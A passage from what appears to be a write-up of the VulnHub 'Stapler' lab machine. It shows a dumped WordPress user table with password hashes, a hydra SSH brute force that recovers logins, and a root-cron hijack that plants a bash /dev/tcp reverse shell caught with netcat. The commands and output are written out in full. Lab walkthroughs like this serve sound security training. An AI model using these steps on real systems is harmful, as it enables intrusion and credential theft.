| 9 | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy | kathy@red.localhost | | 2016-06-05 16:19:14 | | 0 | kathy |
| 10 | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim | tim@red.localhost | | 2016-06-05 16:19:29 | | 0 | tim |
| 11 | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe | zoe@red.localhost | | 2016-06-05 16:19:50 | | 0 | ZOE |
| 12 | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave | dave@red.localhost | | 2016-06-05 16:20:09 | | 0 | Dave |
| 13 | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon | simon@red.localhost | | 2016-06-05 16:20:35 | | 0 | Simon |
| 14 | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby | abby@red.localhost | | 2016-06-05 16:20:53 | | 0 | Abby |
| 15 | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki | vicki@red.localhost | | 2016-06-05 16:21:14 | | 0 | Vicki |
| 16 | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam | pam@red.localhost | | 2016-06-05 16:42:23 | | 0 | Pam |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.00 sec)
</pre>
Paste them into a text file and use cut to extract just the password hashses:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># root@kali:~/vulnhub/stapler# cat wp_users.dump | cut -d "|" -f 4
$P$B7889EMq/erHIuZapMB8GEizebcIy9.
$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
</pre>
Crack the password hashes using hashcat with rockyou wordlist and test for credential reuse by using hydra to brute force SSH
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># hydra -L ssh_users.txt -P ssh_pass.txt 10.0.133.27 ssh -t4
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-24 18:11:50
[DATA] max 4 tasks per 1 server, overall 4 tasks, 290 login tries (l:29/p:10), ~73 tries per task
[DATA] attacking ssh://10.0.133.27:22/
[STATUS] 84.00 tries/min, 84 tries in 00:01h, 206 to do in 00:03h, 4 active
[22][ssh] host: 10.0.133.27 login: JBare password: cookie
[22][ssh] host: 10.0.133.27 login: LSolum password: incorrect
[22][ssh] host: 10.0.133.27 login: zoe password: plbkac
[STATUS] 88.00 tries/min, 264 tries in 00:03h, 26 to do in 00:01h, 4 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-03-24 18:15:12
</pre>
Alternative privilege escalation
================================
Exploit Cron job
----------------
A cron job exists on Stapler,`/etc/cron.d/logrotate`\ that is set to run every 5 minutes as root and runs a script `cron-logrotate.sh`. |br|
www-data does not have permission to modify the cron job directly but the shell script the cron job calls has `777` permissions and can be modified to escalate privileges to root.
.. raw:: html
<pre class="terminal">
</blogblog/wp-content/uploads$ cat /etc/cron.d/logrotate
*/5 * * * * root /usr/local/sbin/cron-logrotate.sh
</blogblog/wp-content/uploads$ ls -la /usr/local/sbin/cron-logrotate.sh
-rwxrwxrwx 1 root root 51 Jun 3 2016 /usr/local/sbin/cron-logrotate.sh
</pre>
Echo the following script into /usr/local/sbin/cron-logrotate.sh
.. raw:: html
<pre class="terminal">
www-data@red:/var/www/https/blogblog/wp-content/uploads$ echo -e \#\!/bin/bash \\n'/bin/bash -i >& /dev/tcp/10.0.133.6/444 0>&1' > /usr/local/sbin/cron-logrotate.sh
<cp/10.0.133.6/444 0>&1' > /usr/local/sbin/cron-logrotate.sh
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cat /usr/local/sbin/cron-logrotate.sh
</blogblog/wp-content/uploads$ cat /usr/local/sbin/cron-logrotate.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.0.133.6/444 0>&1
</pre>
Start a netcat listener on port 444 and wait for the cron job to run the cron-logrotate.sh as root and the reverse shell to connect
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># nc -lnvp 444
listening on [any] 444 ...
connect to [10.0.133.6] from (UNKNOWN) [10.0.133.27] 48282
bash: cannot set terminal process group (29084): Inappropriate ioctl for device
bash: no job control in this shell
root@red:~# id
id
uid=0(root) gid=0(root) groups=0(root)
</pre>